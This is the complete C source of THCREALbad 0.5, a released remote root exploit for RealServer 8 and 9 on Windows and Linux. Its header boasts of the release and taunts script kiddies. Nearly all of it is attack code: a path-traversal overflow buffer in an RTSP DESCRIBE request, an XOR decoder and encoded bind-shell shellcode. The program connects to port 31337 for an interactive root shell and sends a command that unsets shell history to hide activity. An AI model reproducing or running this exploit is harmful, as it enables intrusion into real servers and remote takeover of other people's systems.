123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311 |
- /*****************************************************************************/
- /* THCREALbad 0.5 - Wind0wZ & Linux remote root exploit */
- /* Exploit by: Johnny Cyberpunk (jcyberpunk@thehackerschoice.com) */
- /* THC PUBLIC SOURCE MATERIALS */
- /* */
- /* This exploit was an 0day from some time, but as CANVAS leaked and kiddies */
- /* exploited this bug like hell, realnetworks got info on that bug and posted*/
- /* a workaround on their site. So THC decided to release this one to the */
- /* public now. Fuck u kiddies ! BURST IN HELL ! */
- /* *//* */
- /* Also try the testing mode before exploitation of this bug, what OS is */
- /* running on the remote site, to know what type of shellcode to use. */
- /* */
- /* Greetings go to Dave Aitel of Immunitysec who found that bug. */
- /* */
- /* compile with MS Visual C++ : cl THCREALbad.c */
- /* */
- /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
- /* scut, stealth, zip, zilvio, LSD and Dave Aitel */
- /*****************************************************************************/
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <winsock2.h>
- #define WINDOWS 0
- #define LINUX 1
- #define OSTESTMODE 2
- #pragma comment(lib, "ws2_32.lib")
- #define CMD "unset HISTFILE;uname -a;id;\n"
- char ostestmode[] = "OPTIONS / RTSP/1.0\r\n\r\n";
-
- char attackbuffer1[] =
- "DESCRIBE /"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../"
- "../../../../../../../../../../../../../../../../../../../../";
- char attackbuffer2[] =
- ".smi RTSP/1.0\r\n\r\n";
- char decoder[] =
- "\xcc\xcc\x90\x8b\xfd\x83\xc7\x37\x33\xc9\xb2\x90\x66\x81\xc1"
- "\x02\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7";
- char linuxshell[] =
- "\x32\xc3\x32\xd8\x32\xca\x52\xb2\x05\x52\xb2\x02\x52\xb2\x01"
- "\x52\x8a\xe2\xb0\x02\xb3\x65\xce\x83\x8a\xc2\x32\xc3\x32\xd8"
- "\x53\x53\x53\x65\x6b\x79\x6a\xb0\x01\x65\x50\x8a\xe1\xb0\x13"
- "\x50\xb0\x01\x51\x52\x8a\xc9\x8a\xe2\xb3\x65\xce\x83\x32\xd8"
- "\x3a\xc0\x77\x06\x32\xc3\x43\xce\x83\x32\xc3\x53\x51\x8a\xe2"
- "\xb0\x07\xb3\x65\xce\x83\x8a\xd4\x32\xc3\x32\xd8\x32\xca\xb0"
- "\x12\xb2\x02\xb3\x33\xce\x83\x32\xc3\x32\xd8\x53\x53\x54\x8a"
- "\xe2\xb0\x06\xb3\x65\xce\x83\x8a\xc5\x32\xc3\x32\xd8\xb3\x01"
- "\xce\x83\x3a\xc0\x76\x43\x32\xc3\x8a\xf8\xb3\x05\xce\x83\x32"
- "\xc3\x32\xca\x8a\xf0\xb3\x3d\xfd\xc3\xce\x83\x32\xc3\x42\xb3"
- "\x3d\xfd\xc3\xce\x83\x32\xc3\x42\xb3\x3d\xfd\xc3\xce\x83\x32"
- "\xc3\x53\x6b\x2c\x2c\x70\x6b\x6b\x2c\x61\x6a\x6d\x8a\xe0\x88"
- "\x57\x27\x0b\x53\x50\x8a\xe2\xb3\x08\xce\x83\x32\xc3\x43\xce"
- "\x83\x32\xc3\x8a\xf0\xb3\x05\xce\x83\xe8\x9a";
- char w32shell[] =
- "\x7b\xb3\xea\xf9\x92\x95\xfc\xc9\x68\x8d\x0c\x4e\x1c\x41\xdc"
- "\xe0\x44\x93\x60\xb7\xb0\xb0\xa0\x98\xc7\xc3\xa2\xcf\xa3\xa2"
- "\xbe\xd4\xdc\xdc\x91\x7b\x95\x78\x69\x6f\x6f\x6f\xcd\x13\x7d"
- "\xba\xfa\xa0\xc9\xf4\x1b\x91\x1b\xd0\x9c\x1b\xe0\x8c\x3d\x1b"
- "\xe8\x98\x1d\xcf\xac\x1b\x8b\x91\x6b\x1b\xcb\xe8\x91\x6b\x1b"
- "\xdb\x8c\x91\x69\x1b\xc3\xb4\x91\x6a\xc3\xc1\xc2\x1b\xcb\xb0"
- "\x91\x6b\xa1\x59\xd1\xa1\x50\x09\x1b\xa4\x1b\x91\x6e\x3c\xa1"
- "\x52\x41\x72\x14\x50\xe5\x67\x9f\x26\xd5\x95\x1d\xd4\xd5\x94"
- "\xf6\xa9\x80\xe5\x71\xf6\xa1\x80\xca\xc8\xce\xc6\xc0\xc2\xbb"
- "\xde\x80\xd1\x9f\x27\x9c\xda\x1b\x94\x18\x91\x68\x9f\x26\xdd"
- "\x95\x19\xd4\x1d\x48\x6e\xdd\x95\xe5\x2e\x6e\xdd\x94\xe4\xb1"
- "\x6e\xdd\xb2\x1d\xcd\x88\xc3\x6f\x40\x19\x57\xfa\x94\xc8\x18"
- "\xd5\x95\x10\xd5\xe7\x9a\x1d\xcd\xe4\x10\xfb\xb6\x84\x79\xe8"
- "\x6f\x6f\x6f\x19\x5e\xa1\x4b\xc3\xc3\xc3\xc3\xc6\xd6\xc6\x6f"
- "\x40\x07\xc5\xc8\xf6\x19\xa0\xfa\x80\xc5\xc7\x6f\xc5\x44\xde"
- "\xc6\xc7\x6f\xc5\x5c\xc3\xc5\xc7\x6f\xc5\x40\x07\x1d\xd5\x18"
- "\xc0\x6f\xc5\x74\xc5\xc5\x6f\xc5\x78\x1d\xd4\x95\x9c\x04\xc3"
- "\xf8\xbe\xf5\xe8\xf5\xf8\xcc\xf3\xfd\xf4\x04\xa1\x42\x1d\xd5"
- "\x5c\x04\xc7\xc7\xc7\xc3\xc3\x6e\x56\x91\x62\xc2\x04\x1d\xd5"
- "\xe8\xc0\x1d\xd5\x18\xc0\x21\x98\xc3\xc3\xfa\x80\x6e\x5e\xc2"
- "\xc3\xc3\xc3\xc5\x6f\xc5\x7c\xfa\x6f\x6f\xc5\x70";
- void usage();
- void shell(int sock);
- int main(int argc, char *argv[])
- {
- unsigned short realport=554;
- unsigned int sock,addr,os,rc;
- unsigned char *finalbuffer,*osbuf;
- struct sockaddr_in mytcp;
- struct hostent * hp;
- WSADATA wsaData;
- printf("\nTHCREALbad v0.5 - Wind0wZ & Linux remote root sploit for Realservers 8+9\n");
- printf("by Johnny Cyberpunk (jcyberpunk@thehackerschoice.com)\n");
- if(argc<3 || argc>3)
- usage();
- finalbuffer = malloc(2000);
- memset(finalbuffer,0,2000);
-
- strcpy(finalbuffer,attackbuffer1);
- os = (unsigned short)atoi(argv[2]);
- switch(os)
- {
- case WINDOWS:
- decoder[11]=0x90;
- break;
- case LINUX:
- decoder[11]=0x03;
- break;
- case OSTESTMODE:
- break;
- default:
- printf("\nillegal OS value!\n");
- exit(-1);
- }
- strcat(finalbuffer,decoder);
-
- if(os==WINDOWS)
- strcat(finalbuffer,w32shell);
- else
- strcat(finalbuffer,linuxshell);
- strcat(finalbuffer,attackbuffer2);
- if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
- {
- printf("WSAStartup failed !\n");
- exit(-1);
- }
-
- hp = gethostbyname(argv[1]);
- if (!hp){
- addr = inet_addr(argv[1]);
- }
- if ((!hp) && (addr == INADDR_NONE) )
- {
- printf("Unable to resolve %s\n",argv[1]);
- exit(-1);
- }
- sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- if (!sock)
- {
- printf("socket() error...\n");
- exit(-1);
- }
-
- if (hp != NULL)
- memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
- else
- mytcp.sin_addr.s_addr = addr;
- if (hp)
- mytcp.sin_family = hp->h_addrtype;
- else
- mytcp.sin_family = AF_INET;
- mytcp.sin_port=htons(realport);
- rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
- if(rc==0)
- {
- if(os==OSTESTMODE)
- {
- send(sock,ostestmode,sizeof(ostestmode),0);
- Sleep(1000);
- osbuf = malloc(2000);
- memset(osbuf,0,2000);
- recv(sock,osbuf,2000,0);
- if(*osbuf != '\0')
- for(; *osbuf != '\0';)
- {
- if((isascii(*osbuf) != 0) && (isprint(*osbuf) != 0))
- {
- if(*osbuf == '\x53' && *(osbuf + 1) == '\x65' && *(osbuf + 2) == '\x72' && *(osbuf + 3) == '\x76' && *(osbuf + 4) == '\x65' && *(osbuf + 5) == '\x72')
- {
- osbuf += 7;
- printf("\nDetected OS: ");
- while(*osbuf != '\n')
- printf("%c", *osbuf++);
- printf("\n");
- break;
- }
- }
- osbuf++;
- }
- free(osbuf);
- }
- else
- {
- send(sock,finalbuffer,2000,0);
- printf("\nexploit send .... sleeping a while ....\n\n");
- Sleep(1000);
- }
- }
- else
- printf("can't connect to realserver port!\n");
-
- shutdown(sock,1);
- closesocket(sock);
- free(finalbuffer);
- if(os==OSTESTMODE)
- exit(0);
- sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- mytcp.sin_port = htons(31337);
- rc = connect(sock, (struct sockaddr *)&mytcp, sizeof(mytcp));
- if(rc!=0)
- {
- printf("can't connect to port 31337 ;( maybe firewalled ...\n");
- exit(-1);
- }
- if(os==LINUX)
- send(sock,CMD,sizeof(CMD),0);
- shell(sock);
- exit(0);
- }
-
- void usage()
- {
- unsigned int a;
- printf("\nUsage: <Host> <OS>\n");
- printf("0 = Wind0wZ\n");
- printf("1 = Linux\n");
- printf("2 = OS Test Mode\n");
- exit(0);
- }
- void shell(int sock)
- {
- int l;
- char buf[1024];
- struct timeval time;
- unsigned long ul[2];
- time.tv_sec = 1;
- time.tv_usec = 0;
- while (1)
- {
- ul[0] = 1;
- ul[1] = sock;
- l = select (0, (fd_set *)&ul, NULL, NULL, &time);
- if(l == 1)
- {
- l = recv (sock, buf, sizeof (buf), 0);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- l = write (1, buf, l);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- }
- else
- {
- l = read (0, buf, sizeof (buf));
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- l = send(sock, buf, l, 0);
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- }
- }
- }
|